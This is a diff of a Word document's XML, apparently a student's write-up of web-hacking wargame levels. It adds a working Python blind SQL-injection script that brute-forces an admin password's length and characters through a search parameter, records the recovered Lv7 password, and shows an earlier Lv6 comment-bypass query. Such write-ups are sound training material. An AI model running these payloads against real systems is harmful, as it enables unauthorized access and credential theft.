--- a/Week3/3주차.docx
+++ b/Week3/3주차.docx
@@ -76,12 +76,1017 @@
         <w:t>select * from tb_lv6 where id='admin'#' and pw=''</w:t>
       </w:r>
     </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:wordWrap/>
+        <w:autoSpaceDE/>
+        <w:autoSpaceDN/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:wordWrap/>
+        <w:autoSpaceDE/>
+        <w:autoSpaceDN/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>L</w:t>
+      </w:r>
+      <w:r>
+        <w:t>v7 code</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:wordWrap/>
+        <w:autoSpaceDE/>
+        <w:autoSpaceDN/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">import </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>urllib.request</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> as req</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>import re</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">from </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>urllib</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> import parse</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>import time</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>lvurl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = "*/q/lv7.php?"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>cookie = "PHPSESSID=*"</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>length = 0</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>while (1):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    length = length + 1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">    query = {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">        'search</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>' :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> """admin%' having length(pw) = """ + str(length) + """#"""</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    }</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    param = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>parse.urlencode</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>(query, encoding = 'UTF-8')</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Myurl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>lvurl+param</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Myreq</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>req.Request</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Myurl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Myreq.add_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>header</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>'cookie', cookie)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Myres</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>req.urlopen</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Myreq</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>time.sleep</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>(0.01)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>urllist</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>list(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>Myres</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>beforecheck</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>re.compile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>("[*][I][D][*]")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    index = 0</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    for </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> in range(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>len</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>urllist</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>)-1):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">        if (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>beforecheck.search</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>urllist</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>[</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>].decode('utf-8'))):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">            index = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>idcheck</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>re.compile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>("[a][d][m][</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>][n]")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    if(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>idcheck.search</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>urllist</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">[index+1].decode("utf-8"))):      </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">        break</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>print(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>"length : {}".format(length))</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>password = []</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>for k</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> in range(length):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    for j in </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>range(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>128):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>val</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>chr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(j)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>if(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>val</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> == '&amp;' or </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>val</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> == '|' or </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>val</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> == '_'):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">            continue</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">        query = {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">            'search</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>' :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> """admin%' having </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>substr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>pw,"""+str</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">(k+1)+""",1) = '""" + </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>val</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> + """'#"""</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">        }</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">        param = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>parse.urlencode</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>(query, encoding = 'UTF-8')</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Myurl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>lvurl+param</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Myreq</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>req.Request</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Myurl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Myreq.add_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>header</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>'cookie', cookie)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Myres</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>req.urlopen</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Myreq</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>time.sleep</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>(0.01)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>urllist</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>list(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>Myres</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>beforecheck</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>re.compile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>("[*][*][I][D][*]")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">        index = 0</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">        for </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> in range(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>len</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>urllist</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>)-1):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">            if (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>beforecheck.search</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>urllist</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>[</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>].decode('utf-8'))):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">                index = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">                break</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>idcheck</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>re.compile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>("[a][d][m][</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>][n]")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">        if(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>idcheck.search</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>urllist</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>[index+1].decode('utf-8'))):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">            </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>password.append</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>val</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">            print ("</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>".join</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>(password))</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">            break</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>print(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>"password : ", end='')</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>print("</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>".join</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>(password))</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
     <w:p>
       <w:pPr>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>L</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">v7 </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>password :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>PASSWD@DM1N</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>L</w:t>
+      </w:r>
+      <w:r>
+        <w:t>v8</w:t>
+      </w:r>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
